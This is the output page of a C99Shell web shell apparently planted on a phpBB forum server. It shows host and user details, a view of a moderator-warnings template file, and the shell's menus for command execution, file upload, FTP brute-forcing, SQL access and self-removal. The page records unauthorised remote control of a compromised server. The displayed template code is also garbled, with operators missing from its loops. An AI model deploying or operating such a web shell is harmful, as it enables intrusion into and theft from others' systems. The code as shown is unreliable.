!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/cache/   drwxrwxr-x
Free 83.39 GB of 96.73 GB (86.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tpl_prosilver_mcp_warn_front.html.php (6.42 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if (!defined('IN_PHPBB')) exit; $this->_tpl_include('mcp_header.html'); ?>

<form method="post" id="mcp" action="<?php echo (isset($this->_rootref['U_POST_ACTION'])) ? $this->_rootref['U_POST_ACTION'] : ''?>">

<h2><?php echo ((isset($this->_rootref['L_WARN_USER'])) ? $this->_rootref['L_WARN_USER'] : ((isset($user->lang['WARN_USER'])) ? $user->lang['WARN_USER'] : '{ WARN_USER }')); ?></h2>

<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <h3><?php echo ((isset($this->_rootref['L_SELECT_USER'])) ? $this->_rootref['L_SELECT_USER'] : ((isset($user->lang['SELECT_USER'])) ? $user->lang['SELECT_USER'] : '{ SELECT_USER }')); ?></h3>

    <fieldset>
    <dl>
        <dt><label for="username"><?php echo ((isset($this->_rootref['L_SELECT_USER'])) ? $this->_rootref['L_SELECT_USER'] : ((isset($user->lang['SELECT_USER'])) ? $user->lang['SELECT_USER'] : '{ SELECT_USER }')); ?>:</label></dt>
        <dd><input name="username" id="username" type="text" class="inputbox" /></dd>
        <dd><strong><a href="<?php echo (isset($this->_rootref['U_FIND_USERNAME'])) ? $this->_rootref['U_FIND_USERNAME'] : ''?>" onclick="find_username(this.href); return false;"><?php echo ((isset($this->_rootref['L_FIND_USERNAME'])) ? $this->_rootref['L_FIND_USERNAME'] : ((isset($user->lang['FIND_USERNAME'])) ? $user->lang['FIND_USERNAME'] : '{ FIND_USERNAME }')); ?></a></strong></dd>
    </dl>
    </fieldset>

    <span class="corners-bottom"><span></span></span></div>
</div>

<fieldset class="submit-buttons">
    <input type="reset" value="<?php echo ((isset($this->_rootref['L_RESET'])) ? $this->_rootref['L_RESET'] : ((isset($user->lang['RESET'])) ? $user->lang['RESET'] : '{ RESET }')); ?>" name="reset" class="button2" />&nbsp; 
    <input type="submit" name="submituser" value="<?php echo ((isset($this->_rootref['L_SUBMIT'])) ? $this->_rootref['L_SUBMIT'] : ((isset($user->lang['SUBMIT'])) ? $user->lang['SUBMIT'] : '{ SUBMIT }')); ?>" class="button1" />
    <?php echo (isset($this->_rootref['S_FORM_TOKEN'])) ? $this->_rootref['S_FORM_TOKEN'] : ''?>
</fieldset>
</form>

<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <h3><?php echo ((isset($this->_rootref['L_MOST_WARNINGS'])) ? $this->_rootref['L_MOST_WARNINGS'] : ((isset($user->lang['MOST_WARNINGS'])) ? $user->lang['MOST_WARNINGS'] : '{ MOST_WARNINGS }')); ?></h3>

    <?php if (sizeof($this->_tpldata['highest'])) {  ?>
        <table class="table1" cellspacing="0">
        <thead>
            <tr>
                <th class="name"><?php echo ((isset($this->_rootref['L_USERNAME'])) ? $this->_rootref['L_USERNAME'] : ((isset($user->lang['USERNAME'])) ? $user->lang['USERNAME'] : '{ USERNAME }')); ?></th>
                <th class="name"><?php echo ((isset($this->_rootref['L_WARNINGS'])) ? $this->_rootref['L_WARNINGS'] : ((isset($user->lang['WARNINGS'])) ? $user->lang['WARNINGS'] : '{ WARNINGS }')); ?></th>
                <th class="name"><?php echo ((isset($this->_rootref['L_LATEST_WARNING_TIME'])) ? $this->_rootref['L_LATEST_WARNING_TIME'] : ((isset($user->lang['LATEST_WARNING_TIME'])) ? $user->lang['LATEST_WARNING_TIME'] : '{ LATEST_WARNING_TIME }')); ?></th>
                <th></th>
            </tr>
        </thead>
        <tbody>

        <?php $_highest_count = (isset($this->_tpldata['highest'])) ? sizeof($this->_tpldata['highest']) : 0;if ($_highest_count) {for ($_highest_i 0$_highest_i $_highest_count; ++$_highest_i){$_highest_val = &$this->_tpldata['highest'][$_highest_i]; ?>
            <tr class="<?php if (!($_highest_val['S_ROW_COUNT'] & 1)  ) {  ?>bg1<?php } else { ?>bg2<?php ?>">
                <td><?php echo $_highest_val['USERNAME_FULL']; ?></td>
                <td><?php echo $_highest_val['WARNINGS']; ?></td>
                <td><?php echo $_highest_val['WARNING_TIME']; ?></td>
                <td><a href="<?php echo $_highest_val['U_NOTES']; ?>"><?php echo ((isset($this->_rootref['L_VIEW_NOTES'])) ? $this->_rootref['L_VIEW_NOTES'] : ((isset($user->lang['VIEW_NOTES'])) ? $user->lang['VIEW_NOTES'] : '{ VIEW_NOTES }')); ?></a></td>
            </tr>
        <?php }} ?>
        </tbody>
        </table>
    <?php } else { ?>
        <p><strong><?php echo ((isset($this->_rootref['L_WARNINGS_ZERO_TOTAL'])) ? $this->_rootref['L_WARNINGS_ZERO_TOTAL'] : ((isset($user->lang['WARNINGS_ZERO_TOTAL'])) ? $user->lang['WARNINGS_ZERO_TOTAL'] : '{ WARNINGS_ZERO_TOTAL }')); ?></strong></p>
    <?php ?>

    <span class="corners-bottom"><span></span></span></div>
</div>

<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <h3><?php echo ((isset($this->_rootref['L_LATEST_WARNINGS'])) ? $this->_rootref['L_LATEST_WARNINGS'] : ((isset($user->lang['LATEST_WARNINGS'])) ? $user->lang['LATEST_WARNINGS'] : '{ LATEST_WARNINGS }')); ?></h3>

    <?php if (sizeof($this->_tpldata['latest'])) {  ?>
        <table class="table1" cellspacing="0">
        <thead>
            <tr>
                <th class="name"><?php echo ((isset($this->_rootref['L_USERNAME'])) ? $this->_rootref['L_USERNAME'] : ((isset($user->lang['USERNAME'])) ? $user->lang['USERNAME'] : '{ USERNAME }')); ?></th>
                <th class="name"><?php echo ((isset($this->_rootref['L_TIME'])) ? $this->_rootref['L_TIME'] : ((isset($user->lang['TIME'])) ? $user->lang['TIME'] : '{ TIME }')); ?></th>
                <th class="name"><?php echo ((isset($this->_rootref['L_TOTAL_WARNINGS'])) ? $this->_rootref['L_TOTAL_WARNINGS'] : ((isset($user->lang['TOTAL_WARNINGS'])) ? $user->lang['TOTAL_WARNINGS'] : '{ TOTAL_WARNINGS }')); ?></th>
                <th></th>
            </tr>
        </thead>
        <tbody>
        <?php $_latest_count = (isset($this->_tpldata['latest'])) ? sizeof($this->_tpldata['latest']) : 0;if ($_latest_count) {for ($_latest_i 0$_latest_i $_latest_count; ++$_latest_i){$_latest_val = &$this->_tpldata['latest'][$_latest_i]; ?>
            <tr class="<?php if (!($_latest_val['S_ROW_COUNT'] & 1)  ) {  ?>bg1<?php } else { ?>bg2<?php ?>">
                <td><?php echo $_latest_val['USERNAME_FULL']; ?></td>
                <td><?php echo $_latest_val['WARNING_TIME']; ?></td>
                <td><?php echo $_latest_val['WARNINGS']; ?></td>
                <td><a href="<?php echo $_latest_val['U_NOTES']; ?>"><?php echo ((isset($this->_rootref['L_VIEW_NOTES'])) ? $this->_rootref['L_VIEW_NOTES'] : ((isset($user->lang['VIEW_NOTES'])) ? $user->lang['VIEW_NOTES'] : '{ VIEW_NOTES }')); ?></a></td>
            </tr>
        <?php }} ?>
        </tbody>
        </table>
    <?php } else { ?>
        <p><strong><?php echo ((isset($this->_rootref['L_WARNINGS_ZERO_TOTAL'])) ? $this->_rootref['L_WARNINGS_ZERO_TOTAL'] : ((isset($user->lang['WARNINGS_ZERO_TOTAL'])) ? $user->lang['WARNINGS_ZERO_TOTAL'] : '{ WARNINGS_ZERO_TOTAL }')); ?></strong></p>
    <?php ?>

    <span class="corners-bottom"><span></span></span></div>
</div>

<?php $this->_tpl_include('mcp_footer.html'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.011 ]--